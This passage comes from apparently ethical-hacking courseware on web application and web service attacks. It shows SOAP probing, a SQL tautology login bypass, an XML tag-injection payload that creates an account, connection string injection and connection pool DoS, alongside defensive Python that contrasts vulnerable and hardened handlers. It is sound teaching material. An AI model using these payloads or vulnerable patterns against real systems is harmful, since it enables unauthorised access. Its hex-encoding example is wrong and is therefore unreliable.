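    """Quote a value that would otherwise be parsed as structure."""
    if not any(ch in value for ch in ";'\"") and value == value.strip():
        return value
    if '"' not in value:
        return '"' + value + '"'
    if "'" not in value:
        return "'" + value + "'"
    raise ValueError("value contains both quote characters")


def build_safe(server: str, database: str, user: str, password: str) -> str:
    """Builder-style assembly: every value is quoted when needed, so an injected
    ';key=value' stays inside the value it was supplied in."""
    pairs = [("Data Source", server), ("Initial Catalog", database),
             ("User ID", user), ("Password", password)]
    return "; ".join(f"{key}={_quote_value(value)}" for key, value in pairs) + ";"
```

Parsing the output of build_unsafe with a password of pwd;Encryption=off yields an Encryption key, and a user ID carrying ;Data Source=Rogue_Server; moves the data source; the same inputs passed through build_safe stay inside their own quoted values. A further control, independent of how the string is built, is to take the server and credential fields from configuration only and never from the request.
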

Connection Pool DoS

The attacker examines the connection pooling settings of the application, constructs a large malicious SQL query, and runs multiple queries simultaneously to consume all connections in the connection pool, causing database queries to fail for legitimate users

Example:
By default in ASP.NET, the maximum allowed connections in the pool is 100 and the timeout is 30 seconds

Thus, an attacker can run 100 multiple queries with 30+ seconds execution time within 30 seconds to cause a connection pool DoS such that no one else would be able to use the database-related parts of the application

Connection Pool DoS

The attacker examines the connection pooling settings of the application, constructs a large malicious SQL query, and runs multiple queries simultaneously to consume all connections in the connection pool, causing database queries to fail for legitimate users.

Example:

By default, in ASP.NET, the maximum allowed connections in the pool is 100 and the timeout is 30 seconds.

Thus, an attacker can run 100 multiple queries with 30+ seconds execution time within 30 seconds to cause a connection pool DoS such that no one else would be able to use the database-related parts of the application.
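The arithmetic above can be checked with a small simulation. The following Python model is an added example, not code from the EC-Council course: it tracks a pool of 100 connections with the 30-second wait timeout quoted above, admits 100 queries of 45 seconds from one client, then lets a legitimate user ask for a connection one second later. The per-client concurrency cap and the command timeout are hypothetical hardening values chosen here to show what actually stops the lockout.

```python
"""Simulated connection pool: why 100 slow queries lock everyone out, and what stops it.

Added example, not from the EC-Council course material. Times are simulated seconds.
The pool size (100) and pool-wait timeout (30 s) are the ASP.NET defaults quoted above;
the per-client cap and command timeout are hypothetical hardening values.
"""

POOL_SIZE = 100          # default Max Pool Size quoted in the text
POOL_WAIT_TIMEOUT = 30   # seconds a caller waits for a free connection, quoted in the text


class ConnectionPool:
    """Discrete-time model: remembers when each checked-out connection is returned."""

    def __init__(self, max_size=POOL_SIZE, wait_timeout=POOL_WAIT_TIMEOUT,
                 per_client_limit=None, command_timeout=None):
        self.max_size = max_size
        self.wait_timeout = wait_timeout
        self.per_client_limit = per_client_limit   # max concurrent queries per client (mitigation)
        self.command_timeout = command_timeout     # DB aborts a query after this many seconds (mitigation)
        self.checked_out = []                      # list of (release_time, client)

    def acquire(self, now, client, query_seconds):
        """Return True if `client` gets a connection at simulated time `now`, else False."""
        # Return connections whose queries have already finished.
        self.checked_out = [(t, c) for t, c in self.checked_out if t > now]
        if self.command_timeout is not None:
            query_seconds = min(query_seconds, self.command_timeout)
        if self.per_client_limit is not None:
            active = sum(1 for _, c in self.checked_out if c == client)
            if active >= self.per_client_limit:
                return False            # this client is throttled; the pool stays free for others
        if len(self.checked_out) < self.max_size:
            self.checked_out.append((now + query_seconds, client))
            return True
        # Pool is full: the caller blocks until the earliest release, but only up to wait_timeout.
        earliest = min(self.checked_out)
        if earliest[0] - now <= self.wait_timeout:
            self.checked_out.remove(earliest)
            self.checked_out.append((earliest[0] + query_seconds, client))
            return True
        return False                    # pool timeout: the query fails


def run_scenario(pool):
    """One client fires 100 queries that each run 45 s at t=0; a legitimate user queries at t=1.

    Returns (number of the flood's queries admitted, whether the legitimate query got a connection).
    """
    admitted = sum(pool.acquire(0, "attacker", 45) for _ in range(100))
    legit_ok = pool.acquire(1, "alice", 1)
    return admitted, legit_ok


if __name__ == "__main__":
    print("defaults only:         ", run_scenario(ConnectionPool()))
    print("command timeout 10 s:  ", run_scenario(ConnectionPool(command_timeout=10)))
    print("plus per-client cap 10:", run_scenario(ConnectionPool(per_client_limit=10, command_timeout=10)))
```

With the defaults alone the legitimate request times out, because the earliest connection comes back 44 seconds later and the pool only waits 30. A command timeout alone keeps the request alive but still makes it queue behind the flood; the per-client cap is what keeps most of the pool free for everyone else.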


Web App Hacking Methodology

Attack Web App Client

Attacks performed on a server-side application infect the client-side application when the client-side application interacts with the malicious server or processes malicious data. The attack on the client side occurs when the client establishes a connection with the server. If there is no connection between client and server, then there is no risk, because no malicious data is passed by the server to the client. Consider an example of a client-side attack where an infected web page targets a specific browser weakness and exploits it successfully. As a result, the malicious server gains unauthorized control over the client system.


Attack Web App Client

Attackers interact with the server-side applications in unexpected ways in order to perform malicious actions against the end users and access unauthorized data. Attackers use various methods to perform the malicious attacks.

The following are the malicious attacks performed by attackers to compromise client-side web applications:

• Cross-Site Scripting
• Redirection Attacks
• HTTP Header Injection
• Frame Injection
• Request Forgery Attacks
• Session Fixation
• Privacy Attacks
• ActiveX Attacks


Web App Hacking Methodology

Attack Web Services

Web services are easily targeted by the attacker. Serious security breaches are caused when an attacker compromises the web services. The different types of web service attacks and their consequences are explained on the following slides.


Attack Web Services

Consequences: Information Leakage, Database Attacks, Application Logic Attacks, DoS Attacks

Web services work atop the legacy web applications, and any attack on a web service will immediately expose an underlying application's business and logic vulnerabilities for various attacks. Web services can be attacked using many techniques as they are made available to users through various mechanisms. Hence, the possibility of vulnerabilities increases. The attacker can exploit those vulnerabilities to compromise the web services. There may be many reasons behind attacking web services. According to the purpose, the attacker can choose the attack to compromise web services. If the attacker's intention is to stop a web service from serving intended users, then the attacker can launch a denial-of-service attack by sending numerous requests.

Various types of attacks used to attack web services are:

• SOAP Injection
• XML Injection
• WSDL Probing Attacks
• Information Leakage
• Application Logic Attacks
• Database Attacks


Web Services Probing Attacks

In the first step, the attacker traps the WSDL document from web service traffic and analyzes it to determine the purpose of the application, functional breakdown, entry points, and message types. These attacks work similarly to SQL injection attacks. The attacker then creates a set of valid requests by selecting a set of operations, and formulating the request messages according to the rules of the XML Schema that can be submitted to the web service. The attacker uses these requests to include malicious content in SOAP requests and analyzes errors to gain a deeper understanding of potential security weaknesses.

Attacker injects an arbitrary character (') in the input field:

    <?xml version="1.0" encoding="UTF-8" standalone="no"?>
    <SOAP-ENV:Envelope xmlns:SOAPSDK1="http://www.w3.org/2001/XMLSchema"
        xmlns:SOAPSDK2="http://www.w3.org/2001/XMLSchema-instance"
        xmlns:SOAPSDK3="http://schemas.xmlsoap.org/soap/encoding/"
        xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
      <SOAP-ENV:Body>
        <SOAPSDK4:GetProductInformationByName xmlns:SOAPSDK4="http://juggyboy/ProductInfo/">
          <SOAPSDK4:name>'</SOAPSDK4:name>
          <SOAPSDK4:uid>312-111-8543</SOAPSDK4:uid>
          <SOAPSDK4:password>5648</SOAPSDK4:password>
        </SOAPSDK4:GetProductInformationByName>
      </SOAP-ENV:Body>
    </SOAP-ENV:Envelope>

Server throws an error:

    <?xml version="1.0" encoding="utf-8"?>
    <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
        xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xmlns:xsd="http://www.w3.org/2001/XMLSchema">
      <soap:Body>
        <soap:Fault>
          <faultcode>soap:Server</faultcode>
          <faultstring>System.Web.Services.Protocols.SoapException: Server was unable to process
            request. ---> System.Data.OleDb.OleDbException: Syntax error (missing operator) in
            query expression 'productname like '' and providerid = '312-111-8543''.
            at System.Data.OleDb.OleDbCommand.ExecuteCommandTextErrorHandling(Int32 hr)
            at System.Data.OleDb.OleDbCommand.ExecuteCommandTextForSingleResult(tagDBPARAMS dbParams, Object&amp; executeResult)
            at System.Data.OleDb.OleDbCommand.ExecuteCommandText(Object&amp; executeResult)
            at System.Data.OleDb.OleDbCommand.ExecuteCommand(CommandBehavior behavior, Object&amp; executeResult)
            at System.Data.OleDb.OleDbCommand.ExecuteReaderInternal(CommandBehavior behavior, String method)
            at System.Data.OleDb.OleDbCommand.ExecuteReader(CommandBehavior behavior)
            at System.Data.OleDb.OleDbCommand.ExecuteReader()
            at ProductInfo.ProductDBAccess.GetProductInformation(String productName, String uid, String password)
            at ProductInfo.ProductInfo.GetProductInformationByName(String name, String uid, String password)
            --- End of inner exception stack trace ---</faultstring>
          <detail />
        </soap:Fault>
      </soap:Body>
    </soap:Envelope>

FIGURE 13.53: Web Services Probing Attacks


Web Service Attacks: SOAP Injection

Simple Object Access Protocol (SOAP) is a lightweight and simple XML-based protocol that is designed to exchange structured and type information on the web. The XML envelope element is always the root element of the SOAP message in the XML schema. The attacker injects malicious query strings in the user input field to bypass web services authentication mechanisms and access backend databases. This attack works similarly to SQL injection attacks.

Account Login form submitted by the attacker:

    Username: %
    Password: ' Or 1=1 Or blah=1

Request sent to http://juggyboy.com/ws/products.asmx:

    <?xml version="1.0" encoding="UTF-8" standalone="no"?>
    <SOAP-ENV:Envelope xmlns:SOAPSDK1="http://www.w3.org/2001/XMLSchema"
        xmlns:SOAPSDK2="http://www.w3.org/2001/XMLSchema-instance"
        xmlns:SOAPSDK3="http://schemas.xmlsoap.org/soap/encoding/"
        xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
      <SOAP-ENV:Body>
        <SOAPSDK4:GetProductInformationByName xmlns:SOAPSDK4="http://juggyboy/ProductInfo/">
          <SOAPSDK4:name>%</SOAPSDK4:name>
          <SOAPSDK4:uid>312-111-8543</SOAPSDK4:uid>
          <SOAPSDK4:password>' Or 1=1 Or blah=1</SOAPSDK4:password>
        </SOAPSDK4:GetProductInformationByName>
      </SOAP-ENV:Body>
    </SOAP-ENV:Envelope>

Server Response:

    <?xml version="1.0" encoding="utf-8"?>
    <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
        xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xmlns:xsd="http://www.w3.org/2001/XMLSchema">
      <soap:Body>
        <GetProductInformationByNameResponse xmlns="http://juggyboy/ProductInfo/">
          <GetProductInformationByNameResult>
            <productId>25</productId>
            <productName>Painting101</productName>
            <productQuantity>3</productQuantity>
            <productPrice>1500</productPrice>
          </GetProductInformationByNameResult>
        </GetProductInformationByNameResponse>
      </soap:Body>
    </soap:Envelope>

FIGURE 13.54: SOAP Injection
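The following Python script is an added example (not code from the EC-Council material) that reproduces, on a constructed SQLite table holding the Painting101 row of the figure, what the probing request of Figure 13.53 and the tautology password of Figure 13.54 do to a handler that concatenates its SQL, compared with one that uses bound parameters and returns a generic fault. SQLite stands in for the OleDb database of the figures, so the leaked error text differs from the page's; the `blah` column named in the figure's password does not exist in this table, so an equivalent tautology without it is used. The service namespace and the uid/password values are taken from the figures.

```python
"""Simulated .asmx-style product lookup: string-built SQL versus bound parameters.

Added example, not code from the EC-Council material. The table, its single row and the
service namespace are constructed from the values in Figures 13.53 and 13.54; SQLite
stands in for the OleDb database of the figures, so its error messages read differently.
"""
import sqlite3
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
SVC_NS = "http://juggyboy/ProductInfo/"          # service namespace from the figures


def make_db():
    """Constructed sample database holding the product shown in Figure 13.54."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (productid INTEGER, productname TEXT, "
               "productquantity INTEGER, productprice INTEGER, providerid TEXT, password TEXT)")
    db.execute("INSERT INTO products VALUES (25, 'Painting101', 3, 1500, '312-111-8543', '5648')")
    return db


def soap_request(name, uid, password):
    """Build the GetProductInformationByName request shown in the figures."""
    env = ET.Element(f"{{{SOAP_NS}}}Envelope")
    op = ET.SubElement(ET.SubElement(env, f"{{{SOAP_NS}}}Body"),
                       f"{{{SVC_NS}}}GetProductInformationByName")
    for tag, value in (("name", name), ("uid", uid), ("password", password)):
        ET.SubElement(op, f"{{{SVC_NS}}}{tag}").text = value
    return ET.tostring(env, encoding="unicode")


def parse_params(soap_xml):
    """Return {"name": ..., "uid": ..., "password": ...} from the request body."""
    body = ET.fromstring(soap_xml).find(f"{{{SOAP_NS}}}Body")
    operation = body[0]
    return {child.tag.split("}")[1]: (child.text or "") for child in operation}


def vulnerable_lookup(db, p):
    """Vulnerable: user input is pasted straight into the SQL text (as in the figures)."""
    sql = ("SELECT productid, productname, productquantity, productprice FROM products "
           f"WHERE productname LIKE '{p['name']}' AND providerid = '{p['uid']}' "
           f"AND password = '{p['password']}'")
    return db.execute(sql).fetchall()


def safe_lookup(db, p):
    """Hardened: bound parameters, so input can never change the query's structure."""
    sql = ("SELECT productid, productname, productquantity, productprice FROM products "
           "WHERE productname LIKE ? AND providerid = ? AND password = ?")
    return db.execute(sql, (p["name"], p["uid"], p["password"])).fetchall()


def handle(db, soap_xml, lookup, leak_errors):
    """Simulated service handler. Returns ("ok", rows) or ("fault", faultstring).

    leak_errors=True mirrors Figure 13.53, where the raw exception text is returned in
    <faultstring>; False returns the generic message a hardened service should send.
    """
    try:
        return "ok", lookup(db, parse_params(soap_xml))
    except sqlite3.Error as exc:
        if leak_errors:
            return "fault", f"{type(exc).__module__}.{type(exc).__name__}: {exc}"
        return "fault", "Server was unable to process request"


PROBE = soap_request("'", "312-111-8543", "5648")        # single quote, as in Figure 13.53
# Figure 13.54's password names a column ("blah") that this constructed table lacks, so an
# equivalent tautology without it is used to keep SQLite from rejecting the statement.
BYPASS = soap_request("%", "312-111-8543", "' OR 1=1 OR ''='")
GENUINE = soap_request("Painting101", "312-111-8543", "5648")


if __name__ == "__main__":
    db = make_db()
    print("probe, vulnerable: ", handle(db, PROBE, vulnerable_lookup, leak_errors=True))
    print("probe, hardened:   ", handle(db, PROBE, safe_lookup, leak_errors=False))
    print("bypass, vulnerable:", handle(db, BYPASS, vulnerable_lookup, leak_errors=True))
    print("bypass, hardened:  ", handle(db, BYPASS, safe_lookup, leak_errors=False))
    print("genuine, hardened: ", handle(db, GENUINE, safe_lookup, leak_errors=False))
```

Two things stand out when the script runs: the probe against the concatenating handler yields a fault string naming the database engine and the failed token, which is exactly the information the probing step harvests, while the same probe against the parameterized handler is just a LIKE pattern that matches nothing; and the tautology that returns the Painting101 row from the concatenating handler returns an empty result from the parameterized one, because the whole password value is compared as data.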


Web Service Attacks: XML Injection

An XML injection attack is one in which the attacker enters values that query XML with values that take advantage of exploits. Attackers inject XML data and tags into user input fields to manipulate the XML schema or populate the XML database with bogus entries. XML injection can be used to bypass authorization, escalate privileges, and generate web services DoS attacks.

Server Side Code (http://juggyboy.com/ws/login.asmx):

    <?xml version="1.0" encoding="ISO-8859-1"?>
    <users>
      <user>
        <username>gandalf</username>
        <password>!c3</password>
        <userid>101</userid>
        <mail>gandalf@middleearth.com</mail>
      </user>
      <user>
        <username>Mark</username>
        <password>12345</password>
        <userid>102</userid>
        <mail>gandalf@middleearth.com</mail>
      </user>
      <user>
        <username>jason</username>
        <password>attck</password>
        <userid>105</userid>
        <mail>jason@juggyboy.com</mail>
      </user>
    </users>

Account Login form submitted by the attacker:

    Username: Mark
    Password: 12345
    E-mail:   mark@certifiedhacker.com</mail></user><user><username>Jason</username><password>attack</password><userid>105</userid><mail>jason@juggyboy.com

The tags injected through the E-mail field close the current <user> element and open another one, which creates a new user account (the third <user> element above) on the server.

FIGURE 13.55: XML Injection
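As an added example (not the course's own code), the Python functions below build the user store of Figure 13.55 in the two ways a login.asmx back end might: by splicing strings, which lets the E-mail value from the figure add a second <user> element, and through the XML API, which stores the same value as text. The user store is constructed from the figure with only its first account kept; the form values are the ones the figure shows.

```python
"""The login.asmx user store of Figure 13.55: string-built XML versus API-built XML.

Added example, not from the EC-Council material. The user store is constructed from the
figure (only the first account is kept) and the E-mail value is the injected one shown there.
"""
import xml.etree.ElementTree as ET

# Constructed user store, modelled on the figure's server-side XML.
USERS_XML = """<users>
  <user>
    <username>gandalf</username>
    <password>!c3</password>
    <userid>101</userid>
    <mail>gandalf@middleearth.com</mail>
  </user>
</users>"""

# The E-mail field value from the figure: it closes the current <user> and opens a new one.
INJECTED_MAIL = ("mark@certifiedhacker.com</mail></user><user><username>Jason</username>"
                 "<password>attack</password><userid>105</userid><mail>jason@juggyboy.com")


def add_user_vulnerable(users_xml, username, password, userid, mail):
    """Vulnerable: the new <user> element is spliced together as text from raw form input."""
    entry = (f"<user><username>{username}</username><password>{password}</password>"
             f"<userid>{userid}</userid><mail>{mail}</mail></user>")
    return users_xml.replace("</users>", entry + "</users>")


def add_user_safe(users_xml, username, password, userid, mail):
    """Hardened: the element is built through the XML API, so input is stored as text
    ('<' is written as '&lt;') and can never add elements of its own."""
    root = ET.fromstring(users_xml)
    user = ET.SubElement(root, "user")
    for tag, value in (("username", username), ("password", password),
                       ("userid", str(userid)), ("mail", mail)):
        ET.SubElement(user, tag).text = value
    return ET.tostring(root, encoding="unicode")


def list_accounts(users_xml):
    """(username, userid) for every <user> the server would now recognise."""
    root = ET.fromstring(users_xml)
    return [(u.findtext("username"), u.findtext("userid")) for u in root.findall("user")]


def stored_mail(users_xml, username):
    """The <mail> text stored for `username`, or None if no such account exists."""
    for user in ET.fromstring(users_xml).findall("user"):
        if user.findtext("username") == username:
            return user.findtext("mail")
    return None


if __name__ == "__main__":
    vulnerable = add_user_vulnerable(USERS_XML, "Mark", "12345", 102, INJECTED_MAIL)
    print("string-built store:", list_accounts(vulnerable))
    safe = add_user_safe(USERS_XML, "Mark", "12345", 102, INJECTED_MAIL)
    print("API-built store:   ", list_accounts(safe))
    print("Mark's stored mail:", stored_mail(safe, "Mark"))
```

The string-built store ends up with three accounts, the third being Jason with userid 105 exactly as the figure's arrow indicates; the API-built store has two, and Mark's mail field simply contains the angle brackets as characters. Validating the userid as an integer and the e-mail against its expected shape is a sensible second layer, but the structural fix is to stop treating input as markup.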


Web Services Parsing Attacks

A parsing attack takes place when an attacker succeeds in modifying the file request or string. The attacker changes the values by superimposing one or more operating system commands via the request. Parsing is possible when the attacker executes the .bat (batch) or .cmd (command) files. Parsing attacks exploit vulnerabilities and weaknesses in the processing capabilities of the XML parser to create a denial-of-service attack or generate logical errors in web service request processing.

Recursive Payloads

XML can easily nest or arrange the elements within a single document to address complex relationships. An attacker queries for web services with a grammatically correct SOAP document that contains infinite processing loops, resulting in exhaustion of XML parser and CPU resources.

Oversize Payloads

XML is relatively verbose, and potentially large files must always be taken into consideration when protecting the infrastructure. Programmers will limit the document's size. Attackers send a payload that is excessively large to consume all system resources, rendering web services inaccessible to other legitimate users.
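A defensive counterpart to the two payload types, as an added Python example that is not part of the course material: the check below refuses oversize request bodies before any parsing and stops a streaming parse at the first element nested deeper than a limit, so a recursive payload never becomes a full tree. MAX_BYTES and MAX_DEPTH are hypothetical policy values; the benign and recursive sample documents are constructed here.

```python
"""Pre-parse limits against oversize and recursive SOAP payloads.

Added example, not from the EC-Council material. The byte and depth limits are
hypothetical policy values; the sample documents are constructed below.
"""
import io
import xml.etree.ElementTree as ET

MAX_BYTES = 1_000_000   # hypothetical: largest request body the service accepts
MAX_DEPTH = 32          # hypothetical: deepest element nesting a valid request needs

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"


class UnsafeDocument(Exception):
    """Raised when a request is refused before the parser does any real work."""


def check_soap_document(data, max_bytes=MAX_BYTES, max_depth=MAX_DEPTH):
    """Refuse oversize or over-nested XML; return the deepest nesting seen otherwise.

    The size check looks at the raw bytes, so an oversize payload is never parsed.
    The depth check uses a streaming parse and raises at the first start tag beyond
    max_depth, so a recursive payload is cut off instead of being built into a tree.
    """
    if len(data) > max_bytes:
        raise UnsafeDocument(f"payload of {len(data)} bytes exceeds limit of {max_bytes}")
    depth = deepest = 0
    for event, elem in ET.iterparse(io.BytesIO(data), events=("start", "end")):
        if event == "start":
            depth += 1
            if depth > max_depth:
                raise UnsafeDocument(f"element nesting exceeds limit of {max_depth}")
            deepest = max(deepest, depth)
        else:
            depth -= 1
            elem.clear()          # drop finished subtrees so memory use stays flat
    return deepest


def is_accepted(data, **limits):
    """True if check_soap_document accepts the payload, False if it refuses it."""
    try:
        check_soap_document(data, **limits)
        return True
    except UnsafeDocument:
        return False


def wrap_in_envelope(body_xml):
    """Constructed helper: place XML inside a minimal SOAP envelope."""
    return (f'<soap:Envelope xmlns:soap="{SOAP_NS}"><soap:Body>{body_xml}'
            f'</soap:Body></soap:Envelope>').encode()


# A normal request: Envelope > Body > operation > parameter (depth 4).
BENIGN = wrap_in_envelope("<GetProductInformationByName><name>Painting101</name>"
                          "</GetProductInformationByName>")
# A recursive payload: grammatically valid XML nested 200 elements deep inside the Body.
RECURSIVE = wrap_in_envelope("<a>" * 200 + "</a>" * 200)


if __name__ == "__main__":
    print("benign request depth:", check_soap_document(BENIGN))
    for label, doc, limits in (("recursive", RECURSIVE, {}),
                               ("oversize", BENIGN, {"max_bytes": 16})):
        try:
            check_soap_document(doc, **limits)
        except UnsafeDocument as exc:
            print(f"{label} refused:", exc)
```

The depth limit matters more than it looks: a parser that builds the whole tree first and checks afterwards has already spent the memory and CPU the attacker wanted it to spend, which is why the check is done on start events during the parse.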


Web Service Attack Tool: soapUI

Source: http://www.soapui.org

soapUI is an open source functional testing tool, mainly used for web service testing. It supports multiple protocols such as SOAP, REST, HTTP, JMS, AMF, and JDBC. It enables you to create advanced performance tests very quickly and run automated functional tests. With the help of this tool, attackers can easily perform web services probing, SOAP injection, XML injection, and web services parsing attacks.


Web Service Attack Tool: XMLSpy

Source: http://www.altova.com

Altova XMLSpy is the XML editor and development environment for modeling, editing, transforming, and debugging XML-related technologies. It offers a graphical schema designer, Smart Fix validation, a code generator, file converters, debuggers, profilers, full database integration, and support for WSDL, SOAP, XSLT, XPath, XQuery, XBRL, and Open XML documents, plus Visual Studio and Eclipse plug-ins, and more.

Module Flow

So far, we have discussed web application concepts, threats associated with web applications, and the hacking methodology. Now we will discuss hacking tools. These tools help attackers in retrieving sensitive information and also to craft and send malicious packets or requests to the victim. Web application hacking tools are especially designed for identifying the vulnerabilities in the web application. With the help of these tools, the attacker can easily exploit the identified vulnerabilities and carry out web application attacks.

Module sections: Web App Concepts, Web App Threats, Hacking Methodology, Web Application Hacking Tools, Countermeasures, Security Tools, Web App Pen Testing


Web Application Hacking Tool: Burp Suite Professional

Source: http://www.portswigger.net

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities. Burp Suite contains key components such as an intercepting proxy, application-aware spider, advanced web application scanner, intruder tool, repeater tool, sequencer tool, etc.


Web Application Hacking Tool: CookieDigger

• CookieDigger helps identify weak cookie generation and insecure implementations of session management by web applications
• It works by collecting and analyzing cookies issued by a web application for multiple users
• The tool reports on the predictability and entropy of the cookie and whether critical information, such as user name and password, are included in the cookie values

[Screenshot: Foundstone CookieDigger, showing the list of test URLs from which cookies are collected]

Web Application Hacking Tool: CookieDigger

Source: http://www.mcafee.com

CookieDigger is a tool that detects weak cookie generation and the insecure implementation of session management by web applications. The tool works by collecting and evaluating the cookies that a web application issues to many users.

The predictability and entropy of the cookie are the factors on which the tool relies. It also reports whether the cookie values contain valuable information such as the login details of the user (user name and password).
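The predictability and credential checks the tool performs can be approximated in a few lines. The following is an added example (my own code, not CookieDigger's and not from the courseware): it estimates per-position entropy across a sample of session cookies and checks whether a user name or password appears in a cookie value in plain, Base64 or hex form. The two cookie samples are constructed here, a random-token scheme for the strong set and a counter-plus-user-name scheme for the weak set; the 64-bit threshold in `assess` is an assumption.

```python
import base64
import math
import secrets
from collections import Counter

# Constructed samples (not collected from any real application):
# a strong scheme (128 random bits per cookie) and a weak one
# (an incrementing counter plus the user name, Base64-encoded).
STRONG_COOKIES = [secrets.token_hex(16) for _ in range(50)]
WEAK_COOKIES = [base64.b64encode(f"{1000 + i}:alice".encode()).decode()
                for i in range(50)]


def positional_entropy(cookies):
    """Shannon entropy, in bits, of each character position across the sample.
    A position that never changes contributes 0 bits and carries no secret."""
    width = min(len(c) for c in cookies)
    n = len(cookies)
    bits = []
    for pos in range(width):
        counts = Counter(c[pos] for c in cookies)
        bits.append(-sum(k / n * math.log2(k / n) for k in counts.values()))
    return bits


def estimated_entropy_bits(cookies):
    """Rough total entropy of the cookie format, as estimated from the sample.
    The estimate is bounded above by log2(sample size) per position, so it
    understates a strong token but cleanly exposes a mostly static one."""
    return sum(positional_entropy(cookies))


def _decodings(value):
    """The cookie as given, then its Base64 and hex decodings where they apply."""
    yield value
    try:
        yield base64.b64decode(value + "=" * (-len(value) % 4)).decode("utf-8", "ignore")
    except ValueError:
        pass
    try:
        yield bytes.fromhex(value).decode("utf-8", "ignore")
    except ValueError:
        pass


def contains_credentials(cookie, username, password):
    """Return 'username' or 'password' if either appears in the cookie value in
    plain, Base64 or hex form, else None. Either is a finding: the session
    identifier should never carry the credential itself."""
    for text in _decodings(cookie):
        if username and username in text:
            return "username"
        if password and password in text:
            return "password"
    return None


def assess(cookies, username, password, minimum_bits=64):
    """Summarise the findings the way a report would (threshold is an assumption)."""
    bits = estimated_entropy_bits(cookies)
    leaks = sorted({f for c in cookies if (f := contains_credentials(c, username, password))})
    return {"estimated_bits": round(bits, 1),
            "predictable": bits < minimum_bits,
            "credential_leaks": leaks}
```

Run `assess(WEAK_COOKIES, "alice", "s3cret")` and the weak scheme reports only a handful of bits (just the counter digits vary) and a user-name leak; the random scheme reports well over a hundred bits and no leak. The sample-size bound means the number is a lower estimate, useful for ranking schemes rather than as an absolute measure.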


Web Application Hacking Tool: WebScarab

• WebScarab is a framework for analyzing applications that communicate using the HTTP and HTTPS protocols
• It allows the attacker to review and modify requests created by the browser before they are sent to the server, and to review and modify responses returned from the server before they are received by the browser

[Screenshot: WebScarab Summary tab listing the conversations proxied for http://www.owasp.org (URL tree with methods, status codes and Set-Cookie flags, and the conversation list with date, method, host, path and origin)]

Web Application Hacking Tool: WebScarab

Source: http://www.owasp.org

WebScarab is a framework for analyzing applications that communicate using the HTTP and HTTPS protocols. It is written in Java, and is thus portable to many platforms. WebScarab has several modes of operation, implemented by a number of plugins. It operates as an intercepting proxy, allowing the attacker to review and modify requests created by the browser before they are sent to the server, and to review and modify responses returned from the server before they are received by the browser. It is able to intercept both HTTP and HTTPS communication. The operator can also review the conversations (requests and responses) that have passed through WebScarab.



Web Application Hacking Tools

A few more tools that can be used for hacking web applications are listed as follows:

• Instant Source available at http://www.blazingtools.com
• w3af available at http://w3af.sourceforge.net
• GNU Wget available at http://gnuwin32.sourceforge.net
• BlackWidow available at http://softbytelabs.com
• cURL available at http://curl.haxx.se
• HttpBee available at http://www.o0o.nu
• Teleport Pro available at http://www.tenmax.com
• WebCopier available at http://www.maximumsoft.com
• HTTrack available at http://www.httrack.com
• MileSCAN ParosPro available at http://www.milescan.com


Module Flow

So far, we have discussed various concepts such as threats associated with web applications, hacking methodology, and hacking tools. All these topics talk about how the attacker breaks into a web application or a website. Now we will discuss web application countermeasures. Countermeasures are the practice of using multiple security systems or technologies to prevent intrusions. These are the key components for protecting and safeguarding the web application against web application attacks.

[Figure: module flow diagram. Stages: Web App Concepts, Web App Threats, Hacking Methodology, Web Application Hacking Tools, Countermeasures, Security Tools, Web App Pen Testing]


Encoding Schemes

• Web applications employ different encoding schemes for their data to safely handle unusual characters and binary data in the way you intend
• URL encoding is the process of converting a URL into valid ASCII format so that data can be safely transported over HTTP
• URL encoding replaces unusual ASCII characters with "%" followed by the character's two-digit ASCII code expressed in hexadecimal, such as:
  %3d  =
  %0a  New line
  %20  space
• An HTML encoding scheme is used to represent unusual characters so that they can be safely combined within an HTML document
• It defines several HTML entities to represent particularly unusual characters

Encoding Schemes

The HTTP protocol and the HTML language are the two major components of web applications. Both of these components are text based. Web applications employ encoding schemes to ensure that both of these components handle unusual characters and binary data safely. The encoding schemes include:

URL Encoding

URLs are permitted to contain only the printable characters of the ASCII code within the range 0x20-0x7e inclusive. Several characters within this range have special meaning when they appear in the URL scheme or HTTP protocol. Hence, such characters are restricted.

URL encoding is the process of converting URLs into valid ASCII format so that data can be safely transported over HTTP. URL encoding replaces unusual ASCII characters with "%" followed by the character's two-digit ASCII code expressed in hexadecimal, such as:

• %3d  =
• %0a  New line
• %20  space


Encoding Schemes (Cont'd)

Unicode Encoding

Unicode is a character encoding standard that is designed to support all of the writing systems used in the world. Unicode encoding is used extensively in attacks on web applications: it helps attackers to bypass filters.

16-bit Unicode encoding: it replaces unusual Unicode characters with "%u" followed by the character's Unicode code point expressed in hexadecimal:
  %u2215  /
  %u00e9

UTF-8: it is a variable-length encoding standard that uses each byte expressed in hexadecimal and preceded by the % prefix:
  %c2%a9
  %e2%89%a0

Base64 Encoding

Base64 schemes are used to encode binary data. A Base64 encoding scheme represents any binary data using only printable ASCII characters. Usually it is used for encoding email attachments for safe transmission over SMTP and also for encoding user credentials.

Example: the ASCII bytes of "cake" are
  01100011 01100001 01101011 01100101
and regrouped into 6-bit units for Base64 encoding they become
  011000 110110 000101 101011 011001 010000 000000 000000

Hex Encoding

An HTML encoding scheme uses the hex value of every character to represent a collection of characters for transmitting binary data.

Example:
  Hello  A125C458D8
  Jason  123B684AD9

TABLE 13.2: Encoding Schemes Table
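As an added example (my own code, not from the courseware), the following Python reproduces the schemes from the URL Encoding section and Table 13.2 on the page's own sample values, and adds the check a defender needs most: a canonicalizer that decodes %uXXXX, %XX and multiply-encoded input before a filter ever sees it. The lowercase-hex URL encoder and the entity map are my own minimal choices, not a library's API; `canonicalize` reports how many decoding rounds were needed, since an input that was encoded more than once is itself worth logging.

```python
import base64
import re

UNRESERVED = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-._~")
# The named entities the HTML encoding scheme uses for the characters that
# matter most inside markup (my own minimal map, not a library's).
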